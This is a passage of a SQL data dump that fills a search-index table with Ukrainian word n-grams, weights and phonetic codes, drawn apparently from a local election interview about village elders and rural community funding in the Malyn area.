сільської','років головою сільської',0,1,1.7667,'р000',1,'*'),(1617320,'років педагогічного','років педагогічного',0,1,1.6333,'р000',1,'*'),(1617321,'років педагогічного весь','років педагогічного весь',0,1,1.8,'р000',1,'*'),(1617322,'років трудового','років трудового',0,1,1.5,'р000',1,'*'),(1617323,'років трудового стажу','років трудового стажу',0,1,1.7,'р000',1,'*'),(1617324,'років я','років я',0,1,1.2333,'р000',1,'*'),(1617325,'років я мала','років я мала',0,1,1.4,'р000',1,'*'),(1617326,'роками','роками',0,0,0.4,'р000',1,'*'),(1617327,'роками тому','роками тому',0,1,1.3667,'р000',1,'*'),(1617328,'роками тому треба','роками тому треба',0,1,1.5667,'р000',1,'*'),(1617329,'руку','руку',0,0,0.2667,'р000',1,'*'),(1617330,'руку під','руку під',0,1,1.2667,'р000',1,'*'),(1617331,'руку під час','руку під час',0,1,1.4,'р000',1,'*'),(1617332,'рядових','рядових',0,0,0.4667,'р000',1,'*'),(1617333,'рядових працівників','рядових працівників',0,1,1.6333,'р000',1,'*'),(1617334,'рядових працівників від','рядових працівників від',0,1,1.7667,'р000',1,'*'),(1617335,'сіл а','сіл а',0,1,1.1667,'с000',1,'*'),(1617336,'сіл а не','сіл а не',0,1,1.2667,'с000',1,'*'),(1617337,'сільські','сільські',0,0,0.5333,'с000',1,'*'),(1617338,'сільські громади','сільські громади',0,1,1.5333,'с000',1,'*'),(1617339,'сільські громади кошти','сільські громади кошти',0,1,1.7333,'с000',1,'*'),(1617340,'сільський','сільський',0,0,0.6,'с000',2,'*'),(1617341,'сільський голова','сільський голова',0,1,1.5333,'с000',2,'*'),(1617342,'сільський голова в','сільський голова в',0,1,1.6,'с000',1,'*'),(1617343,'сільських громад','сільських громад',0,1,1.5333,'с000',1,'*'),(1617344,'сільських громад кожне','сільських громад кожне',0,1,1.7333,'с000',1,'*'),(1617345,'сільських мешканців','сільських мешканців',0,1,1.6333,'с000',1,'*'),(1617346,'сільських мешканців навіть','сільських мешканців навіть',0,1,1.8667,'с000',1,'*'),(1617347,'сільських рад','сільських рад',0,1,1.4333,'с000',1,'*'),(1617348,'сільських рад мали','сільських рад мали',0,1,1.6,'с000',1,'*'),(1617349,'сільських рад село','сільських рад село',0,1,1.6,'с000',1,'*'),(1617350,'сільської ради','сільської ради',0,1,1.4667,'с000',1,'*'),(1617351,'сільської ради і','сільської ради і',0,1,1.5333,'с000',1,'*'),(1617352,'сільської ради затим','сільської ради затим',0,1,1.6667,'с000',1,'*'),(1617353,'саме страшне','саме страшне',0,1,1.4,'с000',1,'*'),(1617354,'саме страшне в','саме страшне в',0,1,1.4667,'с000',1,'*'),(1617355,'самим обирати','самим обирати',0,1,1.4333,'с000',1,'*'),(1617356,'самим обирати старосту','самим обирати старосту',0,1,1.7333,'с000',1,'*'),(1617357,'самобутнє','самобутнє',0,0,0.6,'с000',1,'*'),(1617358,'самобутнє з','самобутнє з',0,1,1.3667,'с000',1,'*'),(1617359,'самобутнє з власними','самобутнє з власними',0,1,1.6667,'с000',1,'*'),(1617360,'самоврядування','самоврядування',0,0,0.9333,'с000',1,'*'),(1617361,'самоврядування десять','самоврядування десять',0,1,1.7,'с000',1,'*'),(1617362,'самоврядування десять років','самоврядування десять років',0,1,1.9,'с000',1,'*'),(1617363,'самоврядування дуже','самоврядування дуже',0,1,1.6333,'с000',1,'*'),(1617364,'самоврядування дуже відповідальні','самоврядування дуже відповідальні',0,1,2,'с000',1,'*'),(1617365,'самоціль','самоціль',0,0,0.5333,'с000',1,'*'),(1617366,'самоціль ми','самоціль ми',0,1,1.3667,'с000',1,'*'),(1617367,'самоціль ми не','самоціль ми не',0,1,1.4667,'с000',1,'*'),(1617368,'своєї','своєї',0,0,0.3333,'с000',1,'*'),(1617369,'своєї громади','своєї громади',0,1,1.4333,'с000',1,'*'),(1617370,'своєї громади сьогодні','своєї громади сьогодні',0,1,1.7333,'с000',1,'*'),(1617371,'свої','свої',0,0,0.2667,'с000',2,'*'),(1617372,'свої власні','свої власні',0,1,1.3667,'с000',1,'*'),(1617373,'свої власні фінансові','свої власні фінансові',0,1,1.7,'с000',1,'*'),(1617374,'свої сили','свої сили',0,1,1.3,'с000',1,'*'),(1617375,'свої сили ці','свої сили ці',0,1,1.4,'с000',1,'*'),(1617376,'своїм завдання','своїм завдання',0,1,1.4667,'с000',1,'*'),(1617377,'своїм завдання ставлю','своїм завдання ставлю',0,1,1.7,'с000',1,'*'),(1617378,'себе на','себе на',0,1,1.2333,'с000',1,'*'),(1617379,'себе на попередньому','себе на попередньому',0,1,1.6667,'с000',1,'*'),(1617380,'селі','селі',0,0,0.2667,'с000',1,'*'),(1617381,'селі знала','селі знала',0,1,1.3333,'с000',1,'*'),(1617382,'селі знала що','селі знала що',0,1,1.4333,'с000',1,'*'),(1617383,'села','села',0,0,0.2667,'с000',1,'*'),(1617384,'села але','села але',0,1,1.2667,'с000',1,'*'),(1617385,'села але й','села але й',0,1,1.3333,'с000',1,'*'),(1617386,'села вийшла','села вийшла',0,1,1.3667,'с000',1,'*'),(1617387,'села вийшла і','села вийшла і',0,1,1.4333,'с000',1,'*'),(1617388,'села зможу','села зможу',0,1,1.3333,'с000',1,'*'),(1617389,'села зможу у','села зможу у',0,1,1.4,'с000',1,'*'),(1617390,'села його','села його',0,1,1.3,'с000',1,'*'),(1617391,'села його будуть','села його будуть',0,1,1.5333,'с000',1,'*'),(1617392,'села ще','села ще',0,1,1.2333,'с000',1,'*'),(1617393,'села ще й','села ще й',0,1,1.3,'с000',1,'*'),(1617394,'село','село',0,0,0.2667,'с000',1,'*'),(1617395,'село залишається','село залишається',0,1,1.5333,'с000',1,'*'),(1617396,'село залишається в','село залишається в',0,1,1.6,'с000',1,'*'),(1617397,'село матиме','село матиме',0,1,1.3667,'с000',1,'*'),(1617398,'село матиме змогу','село матиме змогу',0,1,1.5667,'с000',1,'*'),(1617399,'село піду','село піду',0,1,1.3,'с000',1,'*'),(1617400,'село піду тож','село піду тож',0,1,1.4333,'с000',1,'*'),(1617401,'село самобутнє','село самобутнє',0,1,1.4667,'с000',1,'*'),(1617402,'село самобутнє з','село самобутнє з',0,1,1.5333,'с000',1,'*'),(1617403,'село я','село я',0,1,1.2,'с000',1,'*'),(1617404,'село я з','село я з',0,1,1.2667,'с000',1,'*'),(1617405,'селом','селом',0,0,0.3333,'с000',1,'*'),(1617406,'селом працюючи','селом працюючи',0,1,1.4667,'с000',1,'*'),(1617407,'селом працюючи і','селом працюючи і',0,1,1.5333,'с000',1,'*'),(1617408,'селу','селу',0,0,0.2667,'с000',1,'*'),(1617409,'селу на','селу на',0,1,1.2333,'с000',1,'*'),(1617410,'селу на вирішення','селу на вирішення',0,1,1.5667,'с000',1,'*'),(1617411,'сельчан','сельчан',0,0,0.4667,'с000',1,'*'),(1617412,'сельчан знатиме','сельчан знатиме',0,1,1.5,'с000',1,'*'),(1617413,'сельчан знатиме про','сельчан знатиме про',0,1,1.6333,'с000',1,'*'),(1617414,'селян','селян',0,0,0.3333,'с000',1,'*'),(1617415,'селян а','селян а',0,1,1.2333,'с000',1,'*'),(1617416,'селян а як','селян а як',0,1,1.3333,'с000',1,'*'),(1617417,'селяни','селяни',0,0,0.4,'с000',1,'*'),(1617418,'селяни можутьзалишитись','селяни можутьзалишитись',0,1,1.7667,'с000',1,'*'),(1617419,'селяни можутьзалишитись незахищеними','селяни можутьзалишитись незахищеними',0,1,2,'с000',1,'*'),(1617420,'серед','серед',0,0,0.3333,'с000',2,'*'),(1617421,'серед них','серед них',0,1,1.3,'с000',1,'*'),(1617422,'серед них не','серед них не',0,1,1.4,'с000',1,'*'),(1617423,'сили','сили',0,0,0.2667,'с000',1,'*'),(1617424,'сили ці','сили ці',0,1,1.2333,'с000',1,'*'),(1617425,'сили ці вибори','сили ці вибори',0,1,1.4667,'с000',1,'*'),(1617426,'ситуацію','ситуацію',0,0,0.5333,'с000',1,'*'),(1617427,'ситуацію складається','ситуацію складається',0,1,1.6667,'с000',1,'*'),(1617428,'ситуацію складається враження','ситуацію складається враження',0,1,1.9667,'с000',1,'*'),(1617429,'складається','складається',0,0,0.7333,'с000',1,'*'),(1617430,'складається враження','складається враження',0,1,1.6667,'с000',1,'*'),(1617431,'складається враження що','складається враження що',0,1,1.7667,'с000',1,'*'),(1617432,'совість','совість',0,0,0.4667,'с000',1,'*'),(1617433,'совість серед','совість серед',0,1,1.4333,'с000',1,'*'),(1617434,'совість серед них','совість серед них',0,1,1.5667,'с000',1,'*'),(1617435,'солідарність»','солідарність»',0,0,0.8667,'с000',1,'*'),(1617436,'солідарність» марію','солідарність» марію',0,1,1.6333,'с000',1,'*'),(1617437,'солідарність» марію насіканову','солідарність» марію насіканову',0,1,2,'с000',1,'*'),(1617438,'сподобається','сподобається',0,0,0.8,'с000',1,'*'),(1617439,'сподобається знайдеться','сподобається знайдеться',0,1,1.7667,'с000',1,'*'),(1617440,'сподобається знайдеться тисячу','сподобається знайдеться тисячу',0,1,2,'с000',1,'*'),(1617441,'справ','справ',0,0,0.3333,'с000',1,'*'),(1617442,'справ сельчан','справ сельчан',0,1,1.4333,'с000',1,'*'),(1617443,'справ сельчан знатиме','справ сельчан знатиме',0,1,1.7,'с000',1,'*'),(1617444,'справи','справи',0,0,0.4,'с000',1,'*'),(1617445,'справи принесли','справи принесли',0,1,1.5,'с000',1,'*'),(1617446,'справи принесли користь','справи принесли користь',0,1,1.7667,'с000',1,'*'),(1617447,'справу','справу',0,0,0.4,'с000',1,'*'),(1617448,'справу з','справу з',0,1,1.2667,'с000',1,'*'),(1617449,'справу з селом','справу з селом',0,1,1.4667,'с000',1,'*'),(1617450,'стабільність','стабільність',0,0,0.8,'с000',1,'*'),(1617451,'стабільність у','стабільність у',0,1,1.4667,'с000',1,'*'),(1617452,'стабільність у державі','стабільність у державі',0,1,1.7333,'с000',1,'*'),(1617453,'ставлю','ставлю',0,0,0.4,'с000',1,'*'),(1617454,'ставлю захист','ставлю захист',0,1,1.4333,'с000',1,'*'),(1617455,'ставлю захист сільських','ставлю захист сільських',0,1,1.7667,'с000',1,'*'),(1617456,'стажу','стажу',0,0,0.3333,'с000',1,'*'),(1617457,'стажу маю','стажу маю',0,1,1.3,'с000',1,'*'),(1617458,'стажу маю десять','стажу маю десять',0,1,1.5333,'с000',1,'*'),(1617459,'стане','стане',0,0,0.3333,'с000',1,'*'),(1617460,'стане зрозумілим','стане зрозумілим',0,1,1.5333,'с000',1,'*'),(1617461,'стане зрозумілим хто','стане зрозумілим хто',0,1,1.6667,'с000',1,'*'),(1617462,'становищі','становищі',0,0,0.6,'с000',1,'*'),(1617463,'становищі тому','становищі тому',0,1,1.4667,'с000',1,'*'),(1617464,'становищі тому я','становищі тому я',0,1,1.5333,'с000',1,'*'),(1617465,'старих','старих',0,0,0.4,'с000',1,'*'),(1617466,'старих підприємств','старих підприємств',0,1,1.6,'с000',1,'*'),(1617467,'старих підприємств тобто','старих підприємств тобто',0,1,1.8,'с000',1,'*'),(1617468,'староста','староста',0,0,0.5333,'с000',2,'*'),(1617469,'староста комусь','староста комусь',0,1,1.5,'с000',1,'*'),(1617470,'староста комусь не','староста комусь не',0,1,1.6,'с000',1,'*'),(1617471,'старости','старости',0,0,0.5333,'с000',1,'*'),(1617472,'старости може','старости може',0,1,1.4333,'с000',1,'*'),(1617473,'старости може потрапити','старости може потрапити',0,1,1.7667,'с000',1,'*'),(1617474,'старостинські','старостинські',0,0,0.8667,'с000',1,'*'),(1617475,'старостинські округи','старостинські округи',0,1,1.6667,'с000',1,'*'),(1617476,'старостинські округи які','старостинські округи які',0,1,1.8,'с000',1,'*'),(1617477,'старостою','старостою',0,0,0.6,'с000',1,'*'),(1617478,'старостою обирали','старостою обирали',0,1,1.5667,'с000',1,'*'),(1617479,'старостою обирали місцевих','старостою обирали місцевих',0,1,1.8667,'с000',1,'*'),(1617480,'старосту','старосту',0,0,0.5333,'с000',1,'*'),(1617481,'старосту села','старосту села',0,1,1.4333,'с000',1,'*'),(1617482,'старосту села його','старосту села його',0,1,1.6,'с000',1,'*'),(1617483,'стати','стати',0,0,0.3333,'с000',2,'*'),(1617484,'стати зразковим','стати зразковим',0,1,1.5,'с000',1,'*'),(1617485,'стати зразковим європейським','стати зразковим європейським',0,1,1.9333,'с000',1,'*'),(1617486,'створення робочих','створення робочих',0,1,1.5667,'с000',1,'*'),(1617487,'створення робочих місць','створення робочих місць',0,1,1.7667,'с000',1,'*'),(1617488,'стороння','стороння',0,0,0.5333,'с000',1,'*'),(1617489,'стороння людина','стороння людина',0,1,1.5,'с000',1,'*'),(1617490,'стороння людина якій','стороння людина якій',0,1,1.6667,'с000',1,'*'),(1617491,'страшне','страшне',0,0,0.4667,'с000',1,'*'),(1617492,'страшне в','страшне в',0,1,1.3,'с000',1,'*'),(1617493,'страшне в тому','страшне в тому',0,1,1.4667,'с000',1,'*'),(1617494,'судять','судять',0,0,0.4,'с000',1,'*'),(1617495,'судять і','судять і',0,1,1.2667,'с000',1,'*'),(1617496,'судять і по','судять і по',0,1,1.3667,'с000',1,'*'),(1617497,'суспільства визрів','суспільства визрів',0,1,1.6,'с000',1,'*'),(1617498,'суспільства визрів запит','суспільства визрів запит',0,1,1.8,'с000',1,'*'),(1617499,'сферах','сферах',0,0,0.4,'с000',1,'*'),(1617500,'сферах наскільки','сферах наскільки',0,1,1.5333,'с000',1,'*'),(1617501,'сферах наскільки мені','сферах наскільки мені',0,1,1.7,'с000',1,'*'),(1617502,'сформовані','сформовані',0,0,0.6667,'с000',1,'*'),(1617503,'сформовані коли','сформовані коли',0,1,1.5,'с000',1,'*'),(1617504,'сформовані коли глибше','сформовані коли глибше',0,1,1.7333,'с000',1,'*'),(1617505,'сьогодні у','сьогодні у',0,1,1.3333,'с000',1,'*'),(1617506,'сьогодні у нашій','сьогодні у нашій',0,1,1.5333,'с000',1,'*'),(1617507,'сьогодні шкода','сьогодні шкода',0,1,1.4667,'с000',1,'*'),(1617508,'сьогодні шкода що','сьогодні шкода що',0,1,1.5667,'с000',1,'*'),(1617509,'ті кому','ті кому',0,1,1.2333,'т000',1,'*'),(1617510,'ті кому небайдужа','ті кому небайдужа',0,1,1.5667,'т000',1,'*'),(1617511,'ті хто','ті хто',0,1,1.2,'т000',1,'*'),(1617512,'ті хто добре','ті хто добре',0,1,1.4,'т000',1,'*'),(1617513,'тільки всієї','тільки всієї',0,1,1.4,'т000',1,'*'),(1617514,'тільки всієї громади','тільки всієї громади',0,1,1.6667,'т000',1,'*'),(1617515,'тільки ті','тільки ті',0,1,1.3,'т000',1,'*'),(1617516,'тільки ті хто','тільки ті хто',0,1,1.4333,'т000',1,'*'),(1617517,'та управлінській','та управлінській',0,1,1.5333,'т000',1,'*'),(1617518,'та управлінській сферах','та управлінській сферах',0,1,1.7667,'т000',1,'*'),(1617519,'та яку','та яку',0,1,1.2,'т000',1,'*'),(1617520,'та яку громадянську','та яку громадянську',0,1,1.6333,'т000',1,'*'),(1617521,'так','так',0,0,0.2,'т000',4,'*'),(1617522,'так із','так із',0,1,1.2,'т000',1,'*'),(1617523,'так із 39-ти','так із 39-ти',0,1,1.4,'т000',1,'*'),(1617524,'так щоб','так щоб',0,1,1.2333,'т000',1,'*'),(1617525,'так щоб люди','так щоб люди',0,1,1.4,'т000',1,'*'),(1617526,'такі','такі',0,0,0.2667,'т000',2,'*'),(1617527,'такі кандидати','такі кандидати',0,1,1.4667,'т000',1,'*'),(1617528,'такі кандидати чому','такі кандидати чому',0,1,1.6333,'т000',1,'*'),(1617529,'такий','такий',0,0,0.3333,'т000',1,'*'),(1617530,'такий аналіз','такий аналіз',0,1,1.4,'т000',1,'*'),(1617531,'такий аналіз то','такий аналіз то',0,1,1.5,'т000',1,'*'),(1617532,'такого','такого',0,0,0.4,'т000',1,'*'),(1617533,'такого досвіду','такого досвіду',0,1,1.4667,'т000',1,'*'),(1617534,'такого досвіду достатньо','такого досвіду достатньо',0,1,1.8,'т000',1,'*'),(1617535,'тепер','тепер',0,0,0.3333,'т000',2,'*'),(1617536,'тепер будуть','тепер будуть',0,1,1.4,'т000',1,'*'),(1617537,'тепер будуть на','тепер будуть на',0,1,1.5,'т000',1,'*'),(1617538,'тисячу','тисячу',0,0,0.4,'т000',2,'*'),(1617539,'тисячу причин','тисячу причин',0,1,1.4333,'т000',1,'*'),(1617540,'тисячу причин його','тисячу причин його',0,1,1.6,'т000',1,'*'),(1617541,'то віднині','то віднині',0,1,1.3333,'т000',1,'*'),(1617542,'то віднині це','то віднині це',0,1,1.4333,'т000',1,'*'),(1617543,'то не','то не',0,1,1.1667,'т000',1,'*'),(1617544,'то не будуть','то не будуть',0,1,1.4,'т000',1,'*'),(1617545,'то стане','то стане',0,1,1.2667,'т000',1,'*'),(1617546,'то стане зрозумілим','то стане зрозумілим',0,1,1.6333,'т000',1,'*'),(1617547,'тобто все','тобто все',0,1,1.3,'т000',1,'*'),(1617548,'тобто все робити','тобто все робити',0,1,1.5333,'т000',1,'*'),(1617549,'тож люди','тож люди',0,1,1.2667,'т000',1,'*'),(1617550,'тож люди прийшли','тож люди прийшли',0,1,1.5333,'т000',1,'*'),(1617551,'тож мені','тож мені',0,1,1.2667,'т000',1,'*'),(1617552,'тож мені сьогодні','тож мені сьогодні',0,1,1.5667,'т000',1,'*'),(1617553,'той','той',0,0,0.2,'т000',2,'*'),(1617554,'той мінімальний','той мінімальний',0,1,1.5,'т000',1,'*'),(1617555,'той мінімальний пакет','той мінімальний пакет',0,1,1.7,'т000',1,'*'),(1617556,'тому першим','тому першим',0,1,1.3667,'т000',1,'*'),(1617557,'тому першим своїм','тому першим своїм',0,1,1.5667,'т000',1,'*'),(1617558,'тому треба','тому треба',0,1,1.3333,'т000',1,'*'),(1617559,'тому треба їх','тому треба їх',0,1,1.4333,'т000',1,'*'),(1617560,'тому що','тому що',0,1,1.2333,'т000',1,'*'),(1617561,'тому що на','тому що на',0,1,1.3333,'т000',1,'*'),(1617562,'тому я','тому я',0,1,1.2,'т000',1,'*'),(1617563,'тому я як','тому я як',0,1,1.3,'т000',1,'*'),(1617564,'транспортна','транспортна',0,0,0.7333,'т000',1,'*'),(1617565,'транспортна розв\'язка','транспортна розв',0,1,1.7,'т000',1,'*'),(1617566,'транспортна розв\'язка потрібно','транспортна розв потрібно',0,1,2,'т000',1,'*'),(1617567,'треба','треба',0,0,0.3333,'т000',1,'*'),(1617568,'треба їх','треба їх',0,1,1.2667,'т000',1,'*'),(1617569,'треба їх зберегти','треба їх зберегти',0,1,1.5667,'т000',1,'*'),(1617570,'трудового','трудового',0,0,0.6,'т000',1,'*'),(1617571,'трудового стажу','трудового стажу',0,1,1.5,'т000',1,'*'),(1617572,'трудового стажу маю','трудового стажу маю',0,1,1.6333,'т000',1,'*'),(1617573,'у вас','у вас',0,1,1.1667,'у000',1,'*'),(1617574,'у вас такого','у вас такого',0,1,1.4,'у000',1,'*'),(1617575,'у великій','у великій',0,1,1.3,'у000',1,'*'),(1617576,'у великій малинській','у великій малинській',0,1,1.6667,'у000',1,'*'),(1617577,'у виробничій','у виробничій',0,1,1.4,'у000',1,'*'),(1617578,'у виробничій та','у виробничій та',0,1,1.5,'у000',1,'*'),(1617579,'у депутати малинської','у депутати малинської',0,1,1.7,'у000',1,'*'),(1617580,'у депутати обласної','у депутати обласної',0,1,1.6333,'у000',1,'*'),(1617581,'у депутати судять','у депутати судять',0,1,1.5667,'у000',1,'*'),(1617582,'у державі','у державі',0,1,1.3,'у000',1,'*'),(1617583,'у державі і','у державі і',0,1,1.3667,'у000',1,'*'),(1617584,'у запуск','у запуск',0,1,1.2667,'у000',1,'*'),(1617585,'у запуск нових','у запуск нових',0,1,1.4667,'у000',1,'*'),(1617586,'у міську','у міську',0,1,1.2667,'у000',1,'*'),(1617587,'у міську раду','у міську раду',0,1,1.4333,'у000',1,'*'),(1617588,'у малинській','у малинській',0,1,1.4,'у000',1,'*'),(1617589,'у малинській громаді','у малинській громаді',0,1,1.6667,'у000',1,'*'),(1617590,'у нас','у нас',0,1,1.1667,'у000',1,'*'),(1617591,'у нас є','у нас є',0,1,1.2333,'у000',1,'*'),(1617592,'у нас немає','у нас немає',0,1,1.3667,'у000',1,'*'),(1617593,'у нас хороший','у нас хороший',0,1,1.4333,'у000',1,'*'),(1617594,'у нашій','у нашій',0,1,1.2333,'у000',1,'*'),(1617595,'у нашій команді','у нашій команді',0,1,1.5,'у000',1,'*'),(1617596,'у першу','у першу',0,1,1.2333,'у000',1,'*'),(1617597,'у першу чергу','у першу чергу',0,1,1.4333,'у000',1,'*'),(1617598,'у разі виникнення','у разі виникнення',0,1,1.5667,'у000',1,'*'),(1617599,'у разі потреби','у разі потреби',0,1,1.4667,'у000',1,'*'),(1617600,'у сільських','у сільських',0,1,1.3667,'у000',1,'*'),(1617601,'у сільських мешканців','у сільських мешканців',0,1,1.7,'у000',1,'*'),(1617602,'у свої','у свої',0,1,1.2,'у000',1,'*'),(1617603,'у свої сили','у свої сили',0,1,1.3667,'у000',1,'*'),(1617604,'у суспільства','у суспільства',0,1,1.4333,'у000',1,'*'),(1617605,'у суспільства визрів','у суспільства визрів',0,1,1.6667,'у000',1,'*'),(1617606,'удачі','удачі',0,0,0.3333,'у000',1,'*'),(1617607,'удачі вам','удачі вам',0,1,1.3,'у000',1,'*'),(1617608,'удачі вам амалинській','удачі вам амалинській',0,1,1.7,'у000',1,'*'),(1617609,'узурпація','узурпація',0,0,0.6,'у000',1,'*'),(1617610,'узурпація влади','узурпація влади',0,1,1.5,'у000',1,'*'),(1617611,'узурпація влади людей','узурпація влади людей',0,1,1.7,'у000',1,'*'),(1617612,'управлінській','управлінській',0,0,0.8667,'у000',1,'*'),(1617613,'управлінській сферах','управлінській сферах',0,1,1.6667,'у000',1,'*'),(1617614,'управлінській сферах наскільки','управлінській сферах наскільки',0,1,2,'у000',1,'*'),(1617615,'усіх рангів','усіх рангів',0,1,1.3667,'у000',1,'*'),(1617616,'усіх рангів для','усіх рангів для',0,1,1.5,'у000',1,'*'),(1617617,'фінансові','фінансові',0,0,0.6,'ф000',1,'*'),(1617618,'фінансові ресурси','фінансові ресурси',0,1,1.5667,'ф000',1,'*'),(1617619,'фінансові ресурси які','фінансові ресурси які',0,1,1.7,'ф000',1,'*'),(1617620,'фінансування при','фінансування при',0,1,1.5333,'ф000',1,'*'),(1617621,'фінансування при якому','фінансування при якому',0,1,1.7333,'ф000',1,'*'),(1617622,'фінансуватимуться','фінансуватимуться',0,0,1,'ф000',1,'*'),(1617623,'фінансуватимуться сільські','фінансуватимуться сільські',0,1,1.8667,'ф000',1,'*'),(1617624,'фінансуватимуться сільські громади','фінансуватимуться сільські громади',0,1,2,'ф000',1,'*'),(1617625,'фахово','фахово',0,0,0.4,'ф000',1,'*'),(1617626,'фахово підготовлених','фахово підготовлених',0,1,1.6667,'ф000',1,'*'),(1617627,'фахово підготовлених людей','фахово підготовлених людей',0,1,1.8667,'ф000',1,'*'),(1617628,'формувалися','формувалися',0,0,0.7333,'ф000',1,'*'),(1617629,'формувалися роками','формувалися роками',0,1,1.6,'ф000',1,'*'),(1617630,'формувалися роками тому','формувалися роками тому',0,1,1.7667,'ф000',1,'*'),(1617631,'хороший','хороший',0,0,0.4667,'х000',1,'*'),(1617632,'хороший потенціал','хороший потенціал',0,1,1.5667,'х000',1,'*'),(1617633,'хороший потенціал географічне','хороший потенціал географічне',0,1,1.9667,'х000',1,'*'),(1617634,'хочу','хочу',0,0,0.2667,'х000',1,'*'),(1617635,'хочу відстоювати','хочу відстоювати',0,1,1.5333,'х000',1,'*'),(1617636,'хочу відстоювати права','хочу відстоювати права',0,1,1.7333,'х000',1,'*'),(1617637,'хочу пройти','хочу пройти',0,1,1.3667,'х000',1,'*'),(1617638,'хочу пройти у','хочу пройти у',0,1,1.4333,'х000',1,'*'),(1617639,'хто','хто',0,0,0.2,'х000',1,'*'),(1617640,'хто є','хто є',0,1,1.1667,'х000',1,'*'),(1617641,'хто є хто','хто є хто',0,1,1.3,'х000',1,'*'),(1617642,'хто добре','хто добре',0,1,1.3,'х000',1,'*'),(1617643,'хто добре знає','хто добре знає',0,1,1.4667,'х000',1,'*'),(1617644,'хто що','хто що',0,1,1.2,'х000',1,'*'),(1617645,'хто що ж','хто що ж',0,1,1.2667,'х000',1,'*'),(1617646,'ці','ці',0,0,0.1333,'ц000',2,'*'),(1617647,'ці вибори','ці вибори',0,1,1.3,'ц000',1,'*'),(1617648,'ці вибори іспит','ці вибори іспит',0,1,1.5,'ц000',1,'*'),(1617649,'ці кошти','ці кошти',0,1,1.2667,'ц000',1,'*'),(1617650,'ці кошти будуть','ці кошти будуть',0,1,1.5,'ц000',1,'*'),(1617651,'це все','це все',0,1,1.2,'ц000',1,'*'),(1617652,'це все ліквідовується','це все ліквідовується',0,1,1.7,'ц000',1,'*'),(1617653,'це значить','це значить',0,1,1.3333,'ц000',1,'*'),(1617654,'це значить що','це значить що',0,1,1.4333,'ц000',1,'*'),(1617655,'це не самоціль','це не самоціль',0,1,1.4667,'ц000',1,'*'),(1617656,'це шанс','це шанс',0,1,1.2333,'ц000',1,'*'),(1617657,'це шанс повернутись','це шанс повернутись',0,1,1.6333,'ц000',1,'*'),(1617658,'цього у','цього у',0,1,1.2333,'ц000',1,'*'),(1617659,'цього у нас','цього у нас',0,1,1.3667,'ц000',1,'*'),(1617660,'час голосування','час голосування',0,1,1.5,'ч000',1,'*'),(1617661,'час голосування а','час голосування а',0,1,1.5667,'ч000',1,'*'),(1617662,'час працювала','час працювала',0,1,1.4333,'ч000',1,'*'),(1617663,'час працювала в','час працювала в',0,1,1.5,'ч000',1,'*'),(1617664,'чекати','чекати',0,0,0.4,'ч000',1,'*'),(1617665,'чекати на','чекати на',0,1,1.3,'ч000',1,'*'),(1617666,'чекати на її','чекати на її',0,1,1.4,'ч000',1,'*'),(1617667,'чергу','чергу',0,0,0.3333,'ч000',1,'*'),(1617668,'чергу хочу','чергу хочу',0,1,1.3333,'ч000',1,'*'),(1617669,'чергу хочу відстоювати','чергу хочу відстоювати',0,1,1.7333,'ч000',1,'*'),(1617670,'чи не','чи не',0,1,1.1667,'ч000',1,'*'),(1617671,'чи не кожної','чи не кожної',0,1,1.4,'ч000',1,'*'),(1617672,'чи перепадатиме','чи перепадатиме',0,1,1.5,'ч000',1,'*'),(1617673,'чи перепадатиме щось','чи перепадатиме щось',0,1,1.6667,'ч000',1,'*'),(1617674,'чому','чому',0,0,0.2667,'ч000',1,'*'),(1617675,'чому віддаєте','чому віддаєте',0,1,1.4333,'ч000',1,'*'),(1617676,'чому віддаєте перевагу','чому віддаєте перевагу',0,1,1.7333,'ч000',1,'*'),(1617677,'чомусь','чомусь',0,0,0.4,'ч000',1,'*'),(1617678,'чомусь програли','чомусь програли',0,1,1.5,'ч000',1,'*'),(1617679,'чомусь програли щоб','чомусь програли щоб',0,1,1.6333,'ч000',1,'*'),(1617680,'шанс','шанс',0,0,0.2667,'ш000',1,'*'),(1617681,'шанс повернутись','шанс повернутись',0,1,1.5333,'ш000',1,'*'),(1617682,'шанс повернутись назад','шанс повернутись назад',0,1,1.7333,'ш000',1,'*'),(1617683,'шкода','шкода',0,0,0.3333,'ш000',1,'*'),(1617684,'шкода що','шкода що',0,1,1.2667,'ш000',1,'*'),(1617685,'шкода що селяни','шкода що селяни',0,1,1.5,'ш000',1,'*'),(1617686,'ще й','ще й',0,1,1.1333,'щ000',1,'*'),(1617687,'ще й досі','ще й досі',0,1,1.3,'щ000',1,'*'),(1617688,'що в','що в',0,1,1.1333,'щ000',1,'*'),(1617689,'що в них','що в них',0,1,1.2667,'щ000',1,'*'),(1617690,'що він','що він',0,1,1.2,'щ000',1,'*'),(1617691,'що він не','що він не',0,1,1.3,'щ000',1,'*'),(1617692,'що вони','що вони',0,1,1.2333,'щ000',1,'*'),(1617693,'що вони в','що вони в',0,1,1.3,'щ000',1,'*'),(1617694,'що ж','що ж',0,1,1.1333,'щ000',1,'*'),(1617695,'що ж удачі','що ж удачі',0,1,1.3333,'щ000',1,'*'),(1617696,'що заразвідбувається','що заразвідбувається',0,1,1.6667,'щ000',1,'*'),(1617697,'що заразвідбувається узурпація','що заразвідбувається узурпація',0,1,2,'щ000',1,'*'),(1617698,'що на','що на',0,1,1.1667,'щ000',1,'*'),(1617699,'що на посаду','що на посаду',0,1,1.4,'щ000',1,'*'),(1617700,'що селяни','що селяни',0,1,1.3,'щ000',1,'*'),(1617701,'що селяни можутьзалишитись','що селяни можутьзалишитись',0,1,1.8667,'щ000',1,'*'),(1617702,'що ці','що ці',0,1,1.1667,'щ000',1,'*'),(1617703,'що ці кошти','що ці кошти',0,1,1.3667,'щ000',1,'*'),(1617704,'що якщо','що якщо',0,1,1.2333,'щ000',1,'*'),(1617705,'що якщо вони','що якщо вони',0,1,1.4,'щ000',1,'*'),(1617706,'щоб вони','щоб вони',0,1,1.2667,'щ000',1,'*'),(1617707,'щоб вони почувались','щоб вони почувались',0,1,1.6333,'щ000',1,'*'),(1617708,'щоб люди','щоб люди',0,1,1.2667,'щ000',1,'*'),(1617709,'щоб люди жили','щоб люди жили',0,1,1.4333,'щ000',1,'*'),(1617710,'щоб люди у','щоб люди у',0,1,1.3333,'щ000',1,'*'),(1617711,'щоб у','щоб у',0,1,1.1667,'щ000',1,'*'),(1617712,'щоб у сільських','щоб у сільських',0,1,1.5,'щ000',1,'*'),(1617713,'щоразу','щоразу',0,0,0.4,'щ000',1,'*'),(1617714,'щоразу вирішувати','щоразу вирішувати',0,1,1.5667,'щ000',1,'*'),(1617715,'щоразу вирішувати безліч','щоразу вирішувати 